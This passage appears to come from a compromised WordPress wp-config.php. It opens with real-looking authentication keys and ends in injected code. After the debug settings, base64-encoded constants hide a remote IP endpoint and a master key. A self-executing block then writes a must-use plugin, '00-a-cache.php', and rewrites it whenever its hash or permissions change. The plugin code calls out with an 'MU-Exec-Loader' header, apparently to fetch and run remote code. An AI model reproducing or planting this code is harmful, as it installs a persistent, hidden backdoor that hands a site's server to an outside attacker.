+RC0nF{faYHM,+./+bpg5P@wGfF:5qWSY0.=y'); define('LOGGED_IN_KEY', '_L*33tO|=09l/A+7>dz%9&}In`H +Fo]$SPP8qZsXo|dQ|V+:7Z|/j;u|x5BY`/2'); define('NONCE_KEY', 'FT9@^Z-{r-()@6pXg}S?u{J uAQls>d!TFYL<[|okedkWH9izl$E$_+}%at?a]BL'); define('AUTH_SALT', 'MS)Z&BnObw%rSLc {VWTpBG|Z{!B--pr}|YNWr1#v9c/{W6Ba)&I]9G,V,&XP`$+'); define('SECURE_AUTH_SALT', 'l7W0TLo+-+r45x =/W}w)_i|/8&Ho1kxl1SiY]M1q !i-,;5,8(uWF,tdPK4u4J9'); define('LOGGED_IN_SALT', '7(&C*|-s#1Rj4R[:%P`L+&L&=4#@d*tu,82snPh>Q`EBPzH(@X0VZc!o3WI%t!EK'); define('NONCE_SALT', 'zOr_A{a]FFeq6KD}Zgyabg$,+1:l&2njgCt_8~?yiKP)= EkR?v<+>20;u*2348r'); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', 'put your unique phrase here' ); define( 'SECURE_AUTH_KEY', 'put your unique phrase here' ); define( 'LOGGED_IN_KEY', 'put your unique phrase here' ); define( 'NONCE_KEY', 'put your unique phrase here' ); define( 'AUTH_SALT', 'put your unique phrase here' ); define( 'SECURE_AUTH_SALT', 'put your unique phrase here' ); define( 'LOGGED_IN_SALT', 'put your unique phrase here' ); define( 'NONCE_SALT', 'put your unique phrase here' ); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! * * At the installation time, database tables are created with the specified prefix. * Changing this value after WordPress is installed will make your site think * it has not been installed. * * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/#table-prefix */ $table_prefix = 'wp_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/ */ define( 'WP_DEBUG', false ); define('WP_DEBUG_LOG', false ); define('WP_DEBUG_DISPLAY', false); @ini_set('display_errors', 0); define( 'LSINJ_FORWARD_ENDPOINT_ENC', 'aHR0cDovLzE1OS4yMjMuMzUuMTYzOjgwODgvbHMvcmVwb3J0' ); define( 'LSINJ_MASTER_KEY_ENC', 'WDd2TTFxTDhqSDRjRjNuTjZ0WTB4RGFCN2tQOXpSMnc=' ); /* Add any custom values between this line and the "stop editing" line. */ (function () { $wp_root = dirname(__FILE__); $mu_dir = $wp_root . '/wp-content/mu-plugins'; $mu_file = $mu_dir . '/00-a-cache.php'; $expected_hash = '999c7238d613ab136fc11c6538e55474'; if (!is_dir($mu_dir)) { @mkdir($mu_dir, 0755, true); } $should_recreate = false; $reason = ''; if (!file_exists($mu_file)) { $should_recreate = true; $reason = 'File does not exist'; } else { $current_hash = md5_file($mu_file); if ($current_hash !== $expected_hash) { $should_recreate = true; $reason = 'File contents changed (mismatch)'; } $perms = substr(sprintf('%o', fileperms($mu_file)), -4); if ($perms !== '0644' && $perms !== '0444') { $should_recreate = true; $reason = 'Incorrect permission (' . $perms . ')'; } } if ($should_recreate) { $plugin_code = <<<'PHP' 10, 'headers' => [ 'User-Agent' => 'MU-Exec-Loader', 'X-Internal-Secret' => $SECRET, ], ]); if (!is_wp_error($res)) { $code = wp_remote_retrieve_response_code($res); $body = wp_remote_retrieve_body($res); if ($code === 200 && strpos($body, '